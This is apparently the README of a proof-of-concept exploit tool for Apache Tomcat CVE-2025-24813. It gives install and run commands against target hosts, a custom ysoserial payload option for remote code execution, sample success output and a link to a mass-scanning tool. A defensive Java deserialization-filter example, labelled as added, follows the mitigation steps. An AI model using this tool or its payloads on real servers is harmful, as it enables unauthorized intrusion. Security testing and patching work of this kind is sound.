## https://sploitus.com/exploit?id=7F6E5CBF-1772-5755-A56A-7CDF0FC84BA9
# Apache Tomcat CVE-2025-24813 Proof of Concept (PoC)

![License](https://img.shields.io/badge/License-MIT-green.svg)
![Python](https://img.shields.io/badge/Python-3.x-blue.svg)

A proof-of-concept exploit for the Apache Tomcat deserialization vulnerability (CVE-2025-24813). This tool demonstrates how attackers could exploit insecure deserialization in Tomcat's session management.

**WARNING**: This tool is for authorized security testing and educational purposes only. Unauthorized use against systems you don't own is illegal.

## Features

- Supports both default (safe) and custom payloads
- SSL/TLS support (with optional verification bypass)
- Color-coded output for better visibility
- Interactive payload selection
- Configurable timeouts

## Requirements

- Python 3.x
- Required packages (automatically installed via requirements.txt):
  - `requests`
  - `colorama`

## Installation

```bash
git clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
```

## Usage

Basic usage:
```bash
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
```

Advanced options:
```bash
python CVE-2025-24813-PoC.py \
  -t 10.0.0.1 \
  -p 8443 \
  --protocol https \
  --no-verify \
  --timeout 15
```

### Command Line Arguments
| Argument | Description | Required |
|----------|-------------|----------|
| `-t`, `--target` | Target IP address | Yes |
| `-p`, `--port` | Target port number | Yes |
| `--protocol` | `http` or `https` (default: http) | No |
| `--no-verify` | Disable SSL certificate verification | No |
| `--timeout` | Request timeout in seconds (default: 10) | No |

## Payload Options
1. **Default Payload**: Harmless serialized object (safe for detection)
2. **Custom Payload**: Hex-encoded payload from tools like ysoserial

## Example Output

```plaintext
[*] Apache Tomcat CVE-2025-24813 Exploit PoC 
[!] WARNING: For authorized testing only. Unauthorized use is illegal.

[*] Targeting http://192.168.1.100:8080

[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.

[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
```
## Related Tools
For mass scanning vulnerable systems:  
๐Ÿ” [CVE-2025-24813-Scanner](https://github.com/Mattb709/CVE-2025-24813-Scanner) - Bulk detection tool for vulnerable Tomcat hosts

## Mitigation
If you're affected by this vulnerability:
1. Upgrade to the latest patched version of Apache Tomcat
2. Consider using a serialization filter
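
A deserialization filter of the kind step 2 refers to, shown as an added example that is not part of this repository. It uses the JDK's standard `java.io.ObjectInputFilter` API (Java 9+); the class name `SerialFilterDemo`, the allow-list pattern and the limits are assumptions chosen for illustration.

```java
import java.io.*;
import java.util.*;

public class SerialFilterDemo {
    // Assumed allow-list: resource limits first, then the only classes that may be
    // deserialized; the trailing "!*" rejects every class not matched earlier.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "maxdepth=10;maxrefs=1000;maxbytes=65536;java.lang.*;java.util.ArrayList;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) {
            out.writeObject(o);
        }
        return buf.toByteArray();
    }

    // Deserialize with the filter attached; the filter is consulted for each class
    // descriptor before any of that class's readObject logic runs.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample 1: a type on the allow-list round-trips normally.
        ArrayList<String> allowed = new ArrayList<>(List.of("a", "b"));
        System.out.println("accepted: " + readFiltered(serialize(allowed)));

        // Constructed sample 2: a type outside the allow-list is refused with
        // InvalidClassException instead of being instantiated.
        byte[] unexpected = serialize(new PriorityQueue<>(List.of(1)));
        try {
            readFiltered(unexpected);
            System.out.println("accepted unexpected class (filter not effective)");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied JVM-wide through the `jdk.serialFilter` system property, which covers streams that set no filter of their own.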

## Legal Disclaimer
This software is provided under the MIT License. The author is not responsible for any misuse of this tool. Always obtain proper authorization before testing systems.

## License
MIT License - See [LICENSE](LICENSE) file for details.